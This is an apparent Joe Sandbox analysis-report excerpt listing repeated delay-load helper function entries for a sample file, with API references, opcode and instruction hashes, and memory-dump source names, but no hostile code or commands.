                                                            • Instruction ID: d901c0898de7032e455e40ebe96c451dd669aa2411eecfdaddb51fbf25402681
                                                            • Opcode Fuzzy Hash: b499c5a94cec49c7da0073d93b9165b5ee182b6e0e1991888a9eb03aa6ba4073
                                                            • Instruction Fuzzy Hash: 97B012C135C045BC310431293E06C3B011CC0D1F18330403FF610CC6C1B8400D043432
                                                            Function 00CDE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: b89f841d95c0b845ab0ee70274fb06b173231146a4e6278e093c9facdfcd58fd
                                                            • Instruction ID: d9369021ef2d72499ab7fe389e816bde34870684eb8b5b518bcc91bac16c495e
                                                            • Opcode Fuzzy Hash: b89f841d95c0b845ab0ee70274fb06b173231146a4e6278e093c9facdfcd58fd
                                                            • Instruction Fuzzy Hash: DEB09281358085AD214461092E02C3A0518C091B18320802FB604C8280A8400C012432
                                                            Function 00CDE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 1fd10d91d9f9df279b5432b12e151dce663ac2bcb2522751c66f93049d73bb21
                                                            • Instruction ID: 1d458e69cf1336875d8c97b457d07dbc85e014781e2114fdbf794699b44a57f4
                                                            • Opcode Fuzzy Hash: 1fd10d91d9f9df279b5432b12e151dce663ac2bcb2522751c66f93049d73bb21
                                                            • Instruction Fuzzy Hash: 62B09281258045BE214461092E02D3A0118C091B18320412FF604C8280A8400C002432
                                                            Function 00CDE2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 747564b174e68dd800eef8f1b377c566f9e2ced93376a546241ba11ada5c78d7
                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                            • Opcode Fuzzy Hash: 747564b174e68dd800eef8f1b377c566f9e2ced93376a546241ba11ada5c78d7
                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                            Function 00CDE2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a9ebd94dde72b00b745ca18f9542677e462782ac7f9ec5fa6b636d3c768642c1
                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                            • Opcode Fuzzy Hash: a9ebd94dde72b00b745ca18f9542677e462782ac7f9ec5fa6b636d3c768642c1
                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                            Function 00CDE2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 7ae3ccf22d12ad5e4eb9a37b793cd4a2d225eac0290722713f2d1c9f2d3c5375
                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                            • Opcode Fuzzy Hash: 7ae3ccf22d12ad5e4eb9a37b793cd4a2d225eac0290722713f2d1c9f2d3c5375
                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                            Function 00CDE29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9834e53d724afc10a92121470adf7417b088ec847316550bb4aef95d13dd5ce9
                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                            • Opcode Fuzzy Hash: 9834e53d724afc10a92121470adf7417b088ec847316550bb4aef95d13dd5ce9
                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                            Function 00CDE291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 78a0318e684395c565cef246eda468dae07e002fb19effc05d909ecc40e5f090
                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                            • Opcode Fuzzy Hash: 78a0318e684395c565cef246eda468dae07e002fb19effc05d909ecc40e5f090
                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                            Function 00CDE2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: db1babc88a72de3b1b47c92c3561b2fb04d8ca18855abf0dd7b7acb3c0d012f1
                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                            • Opcode Fuzzy Hash: db1babc88a72de3b1b47c92c3561b2fb04d8ca18855abf0dd7b7acb3c0d012f1
                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                            Function 00CDE2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: ae7f872bf747292a1f828fd7a2c63f56bdc58d47ca453709db728b04de00d283
                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                            • Opcode Fuzzy Hash: ae7f872bf747292a1f828fd7a2c63f56bdc58d47ca453709db728b04de00d283
                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                            Function 00CDE2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 97193a326f77bce9efc03ee15bdb9727b12b20b5040ae35b3c6bf82ae5cd26af
                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                            • Opcode Fuzzy Hash: 97193a326f77bce9efc03ee15bdb9727b12b20b5040ae35b3c6bf82ae5cd26af
                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                            Function 00CDE25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 82d14ec481e3ccc3bd41a4eedaf58dd6af61c082f026ab79437fe6e182af1f28
                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                            • Opcode Fuzzy Hash: 82d14ec481e3ccc3bd41a4eedaf58dd6af61c082f026ab79437fe6e182af1f28
                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                            Function 00CDE27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e7f9d28a080d01f69019e9ef4c135bc2547f33b5f416d45fc74b6eeb14a05eb8
                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                            • Opcode Fuzzy Hash: e7f9d28a080d01f69019e9ef4c135bc2547f33b5f416d45fc74b6eeb14a05eb8
                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                            Function 00CDE219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9d6cf4b5cab08ad41f9333296d35707b8d5b8e826d68c3a0e98c8370b617e743
                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                            • Opcode Fuzzy Hash: 9d6cf4b5cab08ad41f9333296d35707b8d5b8e826d68c3a0e98c8370b617e743
                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                            Function 00CDE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 82edf685798d621dac3ae1328fceb84549465ea026689a039c2399c7060ae2f4
                                                            • Instruction ID: 2a5b9199aa232d9c2ae8bc71c6e955bbead33276d006ddaca92ff94550044b79
                                                            • Opcode Fuzzy Hash: 82edf685798d621dac3ae1328fceb84549465ea026689a039c2399c7060ae2f4
                                                            • Instruction Fuzzy Hash: 3CA001E62A919A7D324872566E46C3B025DC8C1B29330952FFA25E96D1AC9018456873
                                                            Function 00CDE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
